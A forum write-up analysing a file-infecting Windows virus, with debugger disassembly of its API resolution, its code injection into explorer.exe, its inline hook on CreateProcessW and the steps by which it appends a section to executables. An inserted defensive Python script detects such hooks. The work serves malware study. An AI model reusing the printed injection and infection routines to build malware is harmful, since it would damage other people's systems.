Title: Analysis of a file-infecting virus
Author: willJ

I recently got hold of an entry-level virus sample and wrote down my analysis process to share with the friends at 52pojie.

The sample is a regedit.exe. On inspection it is indeed the Windows registry editor, but a closer look shows differences from the original. Compare the entry points:

(screenshot) Original entry point
(screenshot) Entry point after infection

Now look at the sections:

(screenshot) Original section table
(screenshot) After infection: one extra .zxd section is clearly visible

From these points it is easy to tell that the file has been infected, so let's go straight into OllyDbg and start the analysis.

01063000 > 55 push ebp
01063001 8BEC mov ebp,esp
01063003 81EC 00100000 sub esp,0x1000
01063009 60 pushad
0106300A C645 D8 00 mov byte ptr ss:[ebp-0x28],0x0
0106300E 33C0 xor eax,eax
01063010 8945 D9 mov dword ptr ss:[ebp-0x27],eax
01063013 8945 DD mov dword ptr ss:[ebp-0x23],eax
01063016 8945 E1 mov dword ptr ss:[ebp-0x1F],eax
01063019 66:8945 E5 mov word ptr ss:[ebp-0x1B],ax
0106301D 8845 E7 mov byte ptr ss:[ebp-0x19],al
01063020 C745 D0 0000000>mov dword ptr ss:[ebp-0x30],0x0
01063027 C745 D4 0000000>mov dword ptr ss:[ebp-0x2C],0x0
0106302E C745 C0 0000000>mov dword ptr ss:[ebp-0x40],0x0
01063035 C745 C4 0000000>mov dword ptr ss:[ebp-0x3C],0x0
0106303C C745 F8 0000000>mov dword ptr ss:[ebp-0x8],0x0
01063043 C745 BC 0000000>mov dword ptr ss:[ebp-0x44],0x0
0106304A C745 E8 0000000>mov dword ptr ss:[ebp-0x18],0x0
01063051 C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0
01063058 C745 FC 0000000>mov dword ptr ss:[ebp-0x4],0x0
0106305F C745 EC 0000000>mov dword ptr ss:[ebp-0x14],0x0
01063066 C745 CC 0000000>mov dword ptr ss:[ebp-0x34],0x0
0106306D C745 C8 0000000>mov dword ptr ss:[ebp-0x38],0x0
01063074 C745 F4 0000000>mov dword ptr ss:[ebp-0xC],0x0
0106307B 8D35 F8154000 lea esi,dword ptr ds:[0x4015F8]
01063081 56 push esi
01063082 E8 8D080000 call regedit.01063914 ; get the kernel32.dll string
01063087 50 push eax
01063088 E8 EA060000 call regedit.01063777 ; get the kernel32.dll base address
0106308D 85C0 test eax,eax
0106308F 0F84 9D020000 je regedit.01063332
01063095 8945 D0 mov dword ptr ss:[ebp-0x30],eax
01063098 8D35 10164000 lea esi,dword ptr ds:[0x401610]
0106309E 56 push esi
0106309F E8 70080000 call regedit.01063914 ; get the GetProcAddress string
010630A4 50 push eax
010630A5 8B5D D0 mov ebx,dword ptr ss:[ebp-0x30]
010630A8 53 push ebx
010630A9 E8 7C070000 call regedit.0106382A ; get the address of GetProcAddress
010630AE 85C0 test eax,eax
010630B0 0F84 7C020000 je regedit.01063332
010630B6 8945 C0 mov dword ptr ss:[ebp-0x40],eax
010630B9 8D35 E0164000 lea esi,dword ptr ds:[0x4016E0]
010630BF 56 push esi
010630C0 E8 4F080000 call regedit.01063914 ; get the ReadProcessMemory string
010630C5 50 push eax
010630C6 FF75 D0 push dword ptr ss:[ebp-0x30]
010630C9 FF55 C0 call dword ptr ss:[ebp-0x40]
010630CC 85C0 test eax,eax
010630CE 0F84 5E020000 je regedit.01063332
010630D4 8945 BC mov dword ptr ss:[ebp-0x44],eax
010630D7 8D35 0D174000 lea esi,dword ptr ds:[0x40170D]
010630DD 56 push esi
010630DE E8 31080000 call regedit.01063914 ; get the WriteProcessMemory string
010630E3 50 push eax
010630E4 FF75 D0 push dword ptr ss:[ebp-0x30]
010630E7 FF55 C0 call dword ptr ss:[ebp-0x40]
010630EA 85C0 test eax,eax
010630EC 0F84 40020000 je regedit.01063332
010630F2 8945 E8 mov dword ptr ss:[ebp-0x18],eax
010630F5 8D35 7E164000 lea esi,dword ptr ds:[0x40167E]
010630FB 56 push esi
010630FC E8 13080000 call regedit.01063914 ; get the VirtualProtect string
01063101 50 push eax
01063102 FF75 D0 push dword ptr ss:[ebp-0x30]
01063105 FF55 C0 call dword ptr ss:[ebp-0x40]
01063108 85C0 test eax,eax
0106310A 0F84 22020000 je regedit.01063332
01063110 8945 C4 mov dword ptr ss:[ebp-0x3C],eax
01063113 8D35 8D164000 lea esi,dword ptr ds:[0x40168D]
01063119 56 push esi
0106311A E8 F5070000 call regedit.01063914 ; get the VirtualProtectEx string
0106311F 50 push eax
01063120 FF75 D0 push dword ptr ss:[ebp-0x30]
01063123 FF55 C0 call dword ptr ss:[ebp-0x40]
01063126 85C0 test eax,eax
01063128 0F84 04020000 je regedit.01063332
0106312E 8945 F8 mov dword ptr ss:[ebp-0x8],eax
01063131 8D35 1F164000 lea esi,dword ptr ds:[0x40161F]
01063137 56 push esi
01063138 E8 D7070000 call regedit.01063914 ; get the LoadLibraryA string
0106313D 50 push eax
0106313E FF75 D0 push dword ptr ss:[ebp-0x30]
01063141 FF55 C0 call dword ptr ss:[ebp-0x40]
01063144 85C0 test eax,eax
01063146 0F84 E6010000 je regedit.01063332
0106314C 8945 F0 mov dword ptr ss:[ebp-0x10],eax
0106314F 8D35 05164000 lea esi,dword ptr ds:[0x401605]
01063155 56 push esi
01063156 E8 B9070000 call regedit.01063914 ; get the user32.dll string
0106315B 50 push eax
0106315C FF55 F0 call dword ptr ss:[ebp-0x10]
0106315F 85C0 test eax,eax
01063161 0F84 CB010000 je regedit.01063332
01063167 8945 D4 mov dword ptr ss:[ebp-0x2C],eax
0106316A 8D35 2C164000 lea esi,dword ptr ds:[0x40162C]
01063170 56 push esi
01063171 E8 9E070000 call regedit.01063914 ; get the MessageBox string
01063176 50 push eax
01063177 FF75 D4 push dword ptr ss:[ebp-0x2C]
0106317A FF55 C0 call dword ptr ss:[ebp-0x40]
0106317D 85C0 test eax,eax
0106317F 0F84 AD010000 je regedit.01063332
01063185 8945 EC mov dword ptr ss:[ebp-0x14],eax
01063188 8D1D 10104000 lea ebx,dword ptr ds:[0x401010]
0106318E 53 push ebx
0106318F E8 80070000 call regedit.01063914 ; get the program's original entry point
01063194 8DBD F4FFFFFF lea edi,dword ptr ss:[ebp-0xC]
0106319A 57 push edi
0106319B 6A 40 push 0x40
0106319D 68 00200000 push 0x2000
010631A2 50 push eax
010631A3 FF55 C4 call dword ptr ss:[ebp-0x3C]
010631A6 85C0 test eax,eax
010631A8 0F84 84010000 je regedit.01063332
010631AE FF75 C0 push dword ptr ss:[ebp-0x40]
010631B1 FF75 D0 push dword ptr ss:[ebp-0x30]
010631B4 8D9D C8FFFFFF lea ebx,dword ptr ss:[ebp-0x38]
010631BA 53 push ebx
010631BB 8D35 9E164000 lea esi,dword ptr ds:[0x40169E]
010631C1 56 push esi
010631C2 E8 4D070000 call regedit.01063914 ; get the explorer.exe string

All of the above is the classic shellcode technique for locating APIs: the code resolves the APIs it wants and finally fetches the string explorer.exe, because it is going to operate on explorer.exe. Debugging explorer.exe is inconvenient for me, so I manually replaced this string with cmd.exe, which made debugging much easier.

Then I opened a second OllyDbg, started cmd, attached the cmd process in that second OllyDbg, and went back to the OllyDbg holding the virus body to continue. It turns out the target process is modified mainly through WriteProcessMemory.

First WriteProcessMemory:

0006C96C 0106458D /CALL 到 WriteProcessMemory 来自 regedit.01064587
0006C970 0000005C |hProcess = 0000005C
0006C974 009D0000 |Address = 9D0000
0006C978 01063000 |Buffer = offset regedit.<ModuleEntryPoint>
0006C97C 000018AA |BytesToWrite = 18AA (6314.)
0006C980 00000000 \pBytesWritten = NULL
The target address is 9D0000. In the OllyDbg attached to cmd, jump there and see what it has become:

009D0000 55 push ebp
009D0001 8BEC mov ebp,esp
009D0003 81EC 00100000 sub esp,0x1000
009D0009 60 pushad
009D000A C645 D8 00 mov byte ptr ss:[ebp-0x28],0x0
009D000E 33C0 xor eax,eax
009D0010 8945 D9 mov dword ptr ss:[ebp-0x27],eax
009D0013 8945 DD mov dword ptr ss:[ebp-0x23],eax
009D0016 8945 E1 mov dword ptr ss:[ebp-0x1F],eax
009D0019 66:8945 E5 mov word ptr ss:[ebp-0x1B],ax
009D001D 8845 E7 mov byte ptr ss:[ebp-0x19],al
009D0020 C745 D0 0000000>mov dword ptr ss:[ebp-0x30],0x0
009D0027 C745 D4 0000000>mov dword ptr ss:[ebp-0x2C],0x0
009D002E C745 C0 0000000>mov dword ptr ss:[ebp-0x40],0x0
009D0035 C745 C4 0000000>mov dword ptr ss:[ebp-0x3C],0x0
009D003C C745 F8 0000000>mov dword ptr ss:[ebp-0x8],0x0
009D0043 C745 BC 0000000>mov dword ptr ss:[ebp-0x44],0x0
009D004A C745 E8 0000000>mov dword ptr ss:[ebp-0x18],0x0
009D0051 C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0
009D0058 C745 FC 0000000>mov dword ptr ss:[ebp-0x4],0x0
009D005F C745 EC 0000000>mov dword ptr ss:[ebp-0x14],0x0
009D0066 C745 CC 0000000>mov dword ptr ss:[ebp-0x34],0x0
009D006D C745 C8 0000000>mov dword ptr ss:[ebp-0x38],0x0
009D0074 C745 F4 0000000>mov dword ptr ss:[ebp-0xC],0x0
009D007B 8D35 F8154000 lea esi,dword ptr ds:[0x4015F8]
009D0081 56 push esi
009D0082 E8 8D080000 call 009D0914
009D0087 50 push eax
009D0088 E8 EA060000 call 009D0777
009D008D 85C0 test eax,eax
009D008F 0F84 9D020000 je 009D0332
009D0095 8945 D0 mov dword ptr ss:[ebp-0x30],eax
009D0098 8D35 10164000 lea esi,dword ptr ds:[0x401610]
Code has been injected. Set a breakpoint at 9D0000 and see what happens next.

Second WriteProcessMemory:

0006EF88 010632CF /CALL 到 WriteProcessMemory 来自 regedit.010632CC
0006EF8C 0000005C |hProcess = 0000005C
0006EF90 7C802336 |Address = 7C802336
0006EF94 0006FF98 |Buffer = 0006FF98
0006EF98 00000006 |BytesToWrite = 6
0006EF9C 00000000 \pBytesWritten = NULL
The target address is 7C802336. Jumping to 7C802336 in the OllyDbg attached to cmd shows that it is the entry of the API CreateProcess:

7C802336 > 8BFF mov edi,edi
7C802338 55 push ebp
7C802339 8BEC mov ebp,esp
7C80233B 6A 00 push 0x0
7C80233D FF75 2C push dword ptr ss:[ebp+0x2C]
7C802340 FF75 28 push dword ptr ss:[ebp+0x28]
7C802343 FF75 24 push dword ptr ss:[ebp+0x24]
7C802346 FF75 20 push dword ptr ss:[ebp+0x20]
7C802349 FF75 1C push dword ptr ss:[ebp+0x1C]
7C80234C FF75 18 push dword ptr ss:[ebp+0x18]
7C80234F FF75 14 push dword ptr ss:[ebp+0x14]
7C802352 FF75 10 push dword ptr ss:[ebp+0x10]
7C802355 FF75 0C push dword ptr ss:[ebp+0xC]
7C802358 FF75 08 push dword ptr ss:[ebp+0x8]
7C80235B 6A 00 push 0x0
7C80235D E8 3A740100 call kernel32.CreateProcessInternalW
7C802362 5D pop ebp
7C802363 C2 2800 retn 0x28
After WriteProcessMemory:

7C802336 >- E9 00E01C84 jmp 009D033B
7C80233B 0000 add byte ptr ds:[eax],al
7C80233D FF75 2C push dword ptr ss:[ebp+0x2C]
7C802340 FF75 28 push dword ptr ss:[ebp+0x28]
7C802343 FF75 24 push dword ptr ss:[ebp+0x24]
7C802346 FF75 20 push dword ptr ss:[ebp+0x20]
7C802349 FF75 1C push dword ptr ss:[ebp+0x1C]
7C80234C FF75 18 push dword ptr ss:[ebp+0x18]
7C80234F FF75 14 push dword ptr ss:[ebp+0x14]
7C802352 FF75 10 push dword ptr ss:[ebp+0x10]
7C802355 FF75 0C push dword ptr ss:[ebp+0xC]
7C802358 FF75 08 push dword ptr ss:[ebp+0x8]
7C80235B 6A 00 push 0x0
7C80235D E8 3A740100 call kernel32.CreateProcessInternalW
7C802362 5D pop ebp
7C802363 C2 2800 retn 0x28
So it patched the entry into a jump that redirects to its malicious code.

Third WriteProcessMemory:

0006EF88 0106330D /CALL 到 WriteProcessMemory 来自 regedit.0106330A
0006EF8C 0000005C |hProcess = 0000005C
0006EF90 4AD00018 |Address = 4AD00018
0006EF94 0006FF98 |Buffer = 0006FF98
0006EF98 00000004 |BytesToWrite = 4
0006EF9C 00000000 \pBytesWritten = NULL
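The 6-byte overwrite of the CreateProcessW entry above is a classic inline hook: the original `mov edi,edi / push ebp / mov ebp,esp` prologue is replaced by `E9 rel32`, and the target is VA + 5 + rel32. The following added example (mine, not the author's) reproduces the two prologues from the listing as constructed bytes and shows how a defender can decode the jump and flag an export whose first instruction leaves its own module; the kernel32.dll address range is an assumption, not taken from the page.

```python
import struct

# Bytes constructed from the listing above: the first 6 bytes at kernel32!CreateProcessW
# (VA 7C802336 on the analysed machine) before and after the 6-byte WriteProcessMemory.
CREATEPROCESSW_VA = 0x7C802336
CLEAN_PROLOGUE = bytes.fromhex("8BFF558BEC6A")    # mov edi,edi / push ebp / mov ebp,esp / push 0
HOOKED_PROLOGUE = bytes.fromhex("E900E01C8400")   # jmp 009D033B, followed by one leftover 00

# Assumed (not from the page): the address range kernel32.dll occupies in the target process.
KERNEL32_RANGE = (0x7C800000, 0x7C8F6000)


def decode_jmp_rel32(va, code):
    """Return the absolute 32-bit target of an E9 rel32 jump located at `va`, or None
    if `code` does not start with one. Target = VA + 5 (instruction length) + signed rel32."""
    if len(code) < 5 or code[0] != 0xE9:
        return None
    rel = struct.unpack_from("<i", code, 1)[0]
    return (va + 5 + rel) & 0xFFFFFFFF


def check_prologue(va, code, module_range, expected=CLEAN_PROLOGUE):
    """Classify the first bytes of an exported function.

    Returns (verdict, detail). 'inline-hook' means the function starts with a jump whose
    target lies outside the module that owns it, which is what the patched CreateProcessW
    above looks like: it jumps into the injected page at 009D033B.
    """
    if code[: len(expected)] == expected:
        return ("clean", None)
    target = decode_jmp_rel32(va, code)
    if target is None:
        return ("modified", "prologue differs from the expected bytes but is not a JMP rel32")
    lo, hi = module_range
    if lo <= target < hi:
        return ("intra-module-jmp", target)  # hot-patch style redirection inside the module
    return ("inline-hook", target)


if __name__ == "__main__":
    for label, code in (("before", CLEAN_PROLOGUE), ("after", HOOKED_PROLOGUE)):
        verdict, detail = check_prologue(CREATEPROCESSW_VA, code, KERNEL32_RANGE)
        print(label, verdict, f"-> 0x{detail:08X}" if isinstance(detail, int) else "")
```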
Next the virus parent process pops up a MessageBox. Arrow 1 pops up the MessageBox; arrow 2 jumps back to the program's original entry point and normal execution continues.

Now let's see what it does after hijacking cmd. Use cmd to start a normal notepad (I copied notepad to the desktop); as soon as the program runs, the debugger breaks:

7C802336 >- E9 00E01C84 jmp 009D033B
7C80233B 0000 add byte ptr ds:[eax],al
7C80233D FF75 2C push dword ptr ss:[ebp+0x2C]
7C802340 FF75 28 push dword ptr ss:[ebp+0x28]
7C802343 FF75 24 push dword ptr ss:[ebp+0x24]
7C802346 FF75 20 push dword ptr ss:[ebp+0x20]
7C802349 FF75 1C push dword ptr ss:[ebp+0x1C]
7C80234C FF75 18 push dword ptr ss:[ebp+0x18]
7C80234F FF75 14 push dword ptr ss:[ebp+0x14]
7C802352 FF75 10 push dword ptr ss:[ebp+0x10]
7C802355 FF75 0C push dword ptr ss:[ebp+0xC]
7C802358 FF75 08 push dword ptr ss:[ebp+0x8]
7C80235B 6A 00 push 0x0
7C80235D E8 3A740100 call kernel32.CreateProcessInternalW
7C802362 5D pop ebp
7C802363 C2 2800 retn 0x28
Sure enough, it broke at the first address of CreateProcess, and jmp 009D033B goes to its malicious code:

009D033B 55 push ebp
009D033C 8BEC mov ebp,esp
009D033E 81EC 00100000 sub esp,0x1000
009D0344 C785 E0FEFFFF 0>mov dword ptr ss:[ebp-0x120],0x0
009D034E C745 B4 0000000>mov dword ptr ss:[ebp-0x4C],0x0
009D0355 C685 D0FEFFFF 0>mov byte ptr ss:[ebp-0x130],0x0
009D035C 33C9 xor ecx,ecx
009D035E 898D D1FEFFFF mov dword ptr ss:[ebp-0x12F],ecx
009D0364 66:898D D5FEFFF>mov word ptr ss:[ebp-0x12B],cx
009D036B 888D D7FEFFFF mov byte ptr ss:[ebp-0x129],cl
009D0371 C685 ECFEFFFF 0>mov byte ptr ss:[ebp-0x114],0x0
009D0378 B9 2F000000 mov ecx,0x2F
009D037D 33C0 xor eax,eax
009D037F 8DBD EDFEFFFF lea edi,dword ptr ss:[ebp-0x113]
009D0385 F3:AB rep stos dword ptr es:[edi]
009D0387 66:AB stos word ptr es:[edi]
009D0389 AA stos byte ptr es:[edi]
009D038A C785 E8FEFFFF 0>mov dword ptr ss:[ebp-0x118],0x0
009D0394 C745 B0 0000000>mov dword ptr ss:[ebp-0x50],0x0
009D039B C745 B8 0000000>mov dword ptr ss:[ebp-0x48],0x0
009D03A2 C785 E4FEFFFF 0>mov dword ptr ss:[ebp-0x11C],0x0
009D03AC C785 D8FEFFFF 0>mov dword ptr ss:[ebp-0x128],0x0
009D03B6 C745 AC 0000000>mov dword ptr ss:[ebp-0x54],0x0
009D03BD C785 DCFEFFFF 0>mov dword ptr ss:[ebp-0x124],0x0
009D03C7 8D35 F8154000 lea esi,dword ptr ds:[0x4015F8]
009D03CD 56 push esi
009D03CE E8 41050000 call 009D0914 ; get the kernel32.dll string
009D03D3 50 push eax
009D03D4 E8 9E030000 call 009D0777 ; get the kernel32.dll base address
009D03D9 85C0 test eax,eax
009D03DB 0F84 89010000 je 009D056A
009D03E1 8985 E8FEFFFF mov dword ptr ss:[ebp-0x118],eax
009D03E7 8D35 10164000 lea esi,dword ptr ds:[0x401610]
009D03ED 56 push esi
009D03EE E8 21050000 call 009D0914 ; get the GetProcAddress string
009D03F3 50 push eax
009D03F4 FFB5 E8FEFFFF push dword ptr ss:[ebp-0x118]
009D03FA E8 2B040000 call 009D082A ; get the address of GetProcAddress
009D03FF 85C0 test eax,eax
009D0401 0F84 63010000 je 009D056A
009D0407 8945 B0 mov dword ptr ss:[ebp-0x50],eax
009D040A 8D35 7E164000 lea esi,dword ptr ds:[0x40167E]
009D0410 56 push esi
009D0411 E8 FE040000 call 009D0914 ; get the VirtualProtect string
009D0416 50 push eax
009D0417 8B9D E8FEFFFF mov ebx,dword ptr ss:[ebp-0x118]
009D041D 53 push ebx
009D041E FF55 B0 call dword ptr ss:[ebp-0x50]
009D0421 85C0 test eax,eax
009D0423 0F84 41010000 je 009D056A
009D0429 8945 B8 mov dword ptr ss:[ebp-0x48],eax
009D042C 8D35 2F174000 lea esi,dword ptr ds:[0x40172F]
009D0432 56 push esi
009D0433 E8 DC040000 call 009D0914 ; get the WideCharToMultiByte string
009D0438 50 push eax
009D0439 8B9D E8FEFFFF mov ebx,dword ptr ss:[ebp-0x118]
009D043F 53 push ebx
009D0440 FF55 B0 call dword ptr ss:[ebp-0x50]
009D0443 85C0 test eax,eax
009D0445 0F84 1F010000 je 009D056A
009D044B 8985 E4FEFFFF mov dword ptr ss:[ebp-0x11C],eax
009D0451 8D35 1F164000 lea esi,dword ptr ds:[0x40161F]
009D0457 56 push esi
009D0458 E8 B7040000 call 009D0914 ; get the LoadLibraryA string
009D045D 50 push eax
009D045E 8B9D E8FEFFFF mov ebx,dword ptr ss:[ebp-0x118]
009D0464 53 push ebx
009D0465 FF55 B0 call dword ptr ss:[ebp-0x50]
009D0468 85C0 test eax,eax
009D046A 0F84 FA000000 je 009D056A
009D0470 8985 D8FEFFFF mov dword ptr ss:[ebp-0x128],eax
009D0476 8D35 05164000 lea esi,dword ptr ds:[0x401605]
009D047C 56 push esi
009D047D E8 92040000 call 009D0914 ; get the User32.dll string
009D0482 50 push eax
009D0483 FF95 D8FEFFFF call dword ptr ss:[ebp-0x128]
009D0489 85C0 test eax,eax
009D048B 0F84 D9000000 je 009D056A
009D0491 8945 AC mov dword ptr ss:[ebp-0x54],eax
009D0494 8D35 2C164000 lea esi,dword ptr ds:[0x40162C]
009D049A 56 push esi
009D049B E8 74040000 call 009D0914 ; get the MessageBox string
009D04A0 50 push eax
009D04A1 FF75 AC push dword ptr ss:[ebp-0x54]
009D04A4 FF55 B0 call dword ptr ss:[ebp-0x50]
Once again a shellcode-style API resolution. Next, 009D053D is where the program's infection code is:

009D0930 55 push ebp
009D0931 8BEC mov ebp,esp
009D0933 81EC 00200000 sub esp,0x2000
009D0939 C785 20FEFFFF 0>mov dword ptr ss:[ebp-0x1E0],0x0
009D0943 C785 24FEFFFF 0>mov dword ptr ss:[ebp-0x1DC],0x0
009D094D C785 34FEFFFF 0>mov dword ptr ss:[ebp-0x1CC],0x0
009D0957 C785 38FEFFFF 0>mov dword ptr ss:[ebp-0x1C8],0x0
009D0961 C785 1CFEFFFF 0>mov dword ptr ss:[ebp-0x1E4],0x0
009D096B C785 14FEFFFF 0>mov dword ptr ss:[ebp-0x1EC],0x0
009D0975 C785 48FEFFFF 0>mov dword ptr ss:[ebp-0x1B8],0x0
009D097F C785 28FEFFFF 0>mov dword ptr ss:[ebp-0x1D8],0x0
009D0989 C785 4CFEFFFF 0>mov dword ptr ss:[ebp-0x1B4],0x0
009D0993 C785 30FEFFFF 0>mov dword ptr ss:[ebp-0x1D0],0x0
009D099D C785 40FEFFFF 0>mov dword ptr ss:[ebp-0x1C0],0x0
009D09A7 C785 2CFEFFFF 0>mov dword ptr ss:[ebp-0x1D4],0x0
009D09B1 C785 44FEFFFF 0>mov dword ptr ss:[ebp-0x1BC],0x0
009D09BB C785 18FEFFFF 0>mov dword ptr ss:[ebp-0x1E8],0x0
009D09C5 C785 50FEFFFF 0>mov dword ptr ss:[ebp-0x1B0],0x0
009D09CF C785 3CFEFFFF 0>mov dword ptr ss:[ebp-0x1C4],0x0
009D09D9 8D35 38164000 lea esi,dword ptr ds:[0x401638]
009D09DF 56 push esi
009D09E0 E8 2FFFFFFF call 009D0914 ; get the CreateFile string
009D09E5 50 push eax
009D09E6 FF75 0C push dword ptr ss:[ebp+0xC]
009D09E9 FF55 10 call dword ptr ss:[ebp+0x10]
009D09EC 85C0 test eax,eax
009D09EE 0F84 2F030000 je 009D0D23
009D09F4 8985 20FEFFFF mov dword ptr ss:[ebp-0x1E0],eax
009D09FA 8D35 44164000 lea esi,dword ptr ds:[0x401644]
009D0A00 56 push esi
009D0A01 E8 0EFFFFFF call 009D0914 ; get the SetFilePointer string
009D0A06 50 push eax
009D0A07 FF75 0C push dword ptr ss:[ebp+0xC]
009D0A0A FF55 10 call dword ptr ss:[ebp+0x10]
009D0A0D 85C0 test eax,eax
009D0A0F 0F84 0E030000 je 009D0D23
009D0A15 8985 24FEFFFF mov dword ptr ss:[ebp-0x1DC],eax
009D0A1B 8D35 72164000 lea esi,dword ptr ds:[0x401672]
009D0A21 56 push esi
009D0A22 E8 EDFEFFFF call 009D0914 ; get the CloseHandle string
009D0A27 50 push eax
009D0A28 FF75 0C push dword ptr ss:[ebp+0xC]
009D0A2B FF55 10 call dword ptr ss:[ebp+0x10]
009D0A2E 85C0 test eax,eax
009D0A30 0F84 ED020000 je 009D0D23
009D0A36 8985 48FEFFFF mov dword ptr ss:[ebp-0x1B8],eax
009D0A3C 8D35 53164000 lea esi,dword ptr ds:[0x401653]
009D0A42 56 push esi
009D0A43 E8 CCFEFFFF call 009D0914 ; get the ReadFile string
009D0A48 50 push eax
009D0A49 FF75 0C push dword ptr ss:[ebp+0xC]
009D0A4C FF55 10 call dword ptr ss:[ebp+0x10]
009D0A4F 85C0 test eax,eax
009D0A51 0F84 CC020000 je 009D0D23
009D0A57 8985 34FEFFFF mov dword ptr ss:[ebp-0x1CC],eax
009D0A5D 8D35 5C164000 lea esi,dword ptr ds:[0x40165C]
009D0A63 56 push esi
009D0A64 E8 ABFEFFFF call 009D0914 ; get the WriteFile string
009D0A69 50 push eax
009D0A6A FF75 0C push dword ptr ss:[ebp+0xC]
009D0A6D FF55 10 call dword ptr ss:[ebp+0x10]
009D0A70 85C0 test eax,eax
009D0A72 0F84 AB020000 je 009D0D23
009D0A78 8985 38FEFFFF mov dword ptr ss:[ebp-0x1C8],eax
009D0A7E 8D35 66164000 lea esi,dword ptr ds:[0x401666]
009D0A84 56 push esi
009D0A85 E8 8AFEFFFF call 009D0914 ; get the GetFileSize string
009D0A8A 50 push eax
009D0A8B FF75 0C push dword ptr ss:[ebp+0xC]
009D0A8E FF55 10 call dword ptr ss:[ebp+0x10]
009D0A91 85C0 test eax,eax
009D0A93 0F84 8A020000 je 009D0D23
009D0A99 8985 1CFEFFFF mov dword ptr ss:[ebp-0x1E4],eax
009D0A9F 8D35 7E164000 lea esi,dword ptr ds:[0x40167E]
009D0AA5 56 push esi
009D0AA6 E8 69FEFFFF call 009D0914 ; get VirtualProtect
009D0AAB 50 push eax
009D0AAC FF75 0C push dword ptr ss:[ebp+0xC]
009D0AAF FF55 10 call dword ptr ss:[ebp+0x10]
009D0AB2 85C0 test eax,eax
009D0AB4 0F84 69020000 je 009D0D23
009D0ABA 8985 14FEFFFF mov dword ptr ss:[ebp-0x1EC],eax
009D0AC0 B8 00000000 mov eax,0x0
009D0AC5 50 push eax
009D0AC6 68 80000000 push 0x80
009D0ACB 6A 03 push 0x3
009D0ACD 50 push eax
009D0ACE 6A 00 push 0x0
009D0AD0 68 000000C0 push 0xC0000000
009D0AD5 8B75 08 mov esi,dword ptr ss:[ebp+0x8]
009D0AD8 56 push esi
009D0AD9 FF95 20FEFFFF call dword ptr ss:[ebp-0x1E0] ; CreateFile
Here too the file-operation APIs are obtained shellcode-style. The code then adds a zxd section to the target file and copies the malicious code into it.

First WriteFile:
0013BA90 009D1163 /CALL 到 WriteFile 来自 009D1160
0013BA94 000000D4 |hFile = 000000D4 (window)
0013BA98 0013C828 |Buffer = 0013C828
0013BA9C 00000008 |nBytesToWrite = 8
0013BAA0 0013C848 |pBytesWritten = 0013C848
0013BAA4 00000000 \pOverlapped = NULL
Second WriteFile:
0013BA8C 009D1193 /CALL 到 WriteFile 来自 009D1190
0013BA90 000000D4 |hFile = 000000D4 (window)
0013BA94 0013C828 |Buffer = 0013C828
0013BA98 00000020 |nBytesToWrite = 20 (32.)
0013BA9C 0013C848 |pBytesWritten = 0013C848
0013BAA0 00000000 \pOverlapped = NULL
Third WriteFile:
0013BA8C 009D1193 /CALL 到 WriteFile 来自 009D1190
0013BA90 000000D4 |hFile = 000000D4 (window)
0013BA94 0013C828 |Buffer = 0013C828
0013BA98 00000020 |nBytesToWrite = 20 (32.)
0013BA9C 0013C848 |pBytesWritten = 0013C848
0013BAA0 00000000 \pOverlapped = NULL
Fourth WriteFile:
0013BA8C 009D1193 /CALL 到 WriteFile 来自 009D1190
0013BA90 000000D4 |hFile = 000000D4 (window)
0013BA94 0013C828 |Buffer = 0013C828
0013BA98 00000020 |nBytesToWrite = 20 (32.)
0013BA9C 0013C848 |pBytesWritten = 0013C848
0013BAA0 00000000 \pOverlapped = NULL
Fifth WriteFile:
0013BA8C 009D1193 /CALL 到 WriteFile 来自 009D1190
0013BA90 000000D4 |hFile = 000000D4 (window)
0013BA94 0013C828 |Buffer = 0013C828
0013BA98 00000020 |nBytesToWrite = 20 (32.)
0013BA9C 0013C848 |pBytesWritten = 0013C848
0013BAA0 00000000 \pOverlapped = NULL
Sixth WriteFile:
0013BA80 009D104D /CALL 到 WriteFile 来自 009D104A
0013BA84 000000D4 |hFile = 000000D4 (window)
0013BA88 0013C83C |Buffer = 0013C83C
0013BA8C 00000028 |nBytesToWrite = 28 (40.)
0013BA90 0013C864 |pBytesWritten = 0013C864
0013BA94 00000000 \pOverlapped = NULL
Seventh WriteFile:
0013BA84 009D10A9 /CALL 到 WriteFile 来自 009D10A6
0013BA88 000000D4 |hFile = 000000D4 (window)
0013BA8C 0013C83C |Buffer = 0013C83C
0013BA90 00000002 |nBytesToWrite = 2
0013BA94 0013C864 |pBytesWritten = 0013C864
0013BA98 00000000 \pOverlapped = NULL
Eighth WriteFile:
0013BA88 009D10FA /CALL 到 WriteFile 来自 009D10F7
0013BA8C 000000D4 |hFile = 000000D4 (window)
0013BA90 0013C83C |Buffer = 0013C83C
0013BA94 00000004 |nBytesToWrite = 4
0013BA98 0013C864 |pBytesWritten = 0013C864
0013BA9C 00000000 \pOverlapped = NULL
Ninth WriteFile:
0013B488 009D0E65 /CALL 到 WriteFile 来自 009D0E62
0013B48C 000000D4 |hFile = 000000D4 (window)
0013B490 0013C888 |Buffer = 0013C888
0013B494 00000000 |nBytesToWrite = 0
0013B498 0013C878 |pBytesWritten = 0013C878
0013B49C 00000000 \pOverlapped = NULL
Tenth WriteFile:
0013B490 009D0EE7 /CALL 到 WriteFile 来自 009D0EE4
0013B494 000000D4 |hFile = 000000D4 (window)
0013B498 0013C8A8 |Buffer = 0013C8A8
0013B49C 00000004 |nBytesToWrite = 4
0013B4A0 0013C878 |pBytesWritten = 0013C878
0013B4A4 00000000 \pOverlapped = NULL
The section has now been added; the eleventh write puts the infection code into the file, completing the infection.

Eleventh WriteFile:
0013B490 009D0F7C /CALL 到 WriteFile 来自 009D0F79
0013B494 000000D4 |hFile = 000000D4 (window)
0013B498 009D0000 |Buffer = 009D0000
0013B49C 00001A00 |nBytesToWrite = 1A00 (6656.)
0013B4A0 0013C878 |pBytesWritten = 0013C878
0013B4A4 00000000 \pOverlapped = NULL
To summarise, the method for adding a section is:

1. Fix up the section table
2. Add the number of sections you appended to NumberOfSections
3. Append the section data
4. Fix up the image size

The program then writes the malicious code into the added section and modifies the entry point.

Then it starts notepad:

0013EA94 009D05C9 /CALL 到 CreateProcessW 来自 009D05C3
0013EA98 00159350 |ModuleFileName = "C:\Documents and Settings\Administrator\桌面\notepad.exe"
0013EA9C 00158B40 |CommandLine = ""C:\Documents and Settings\Administrator\桌面\notepad.exe""
0013EAA0 00000000 |pProcessSecurity = NULL
0013EAA4 00000000 |pThreadSecurity = NULL
0013EAA8 00000001 |InheritHandles = TRUE
0013EAAC 00000000 |CreationFlags = 0
0013EAB0 00000000 |pEnvironment = NULL
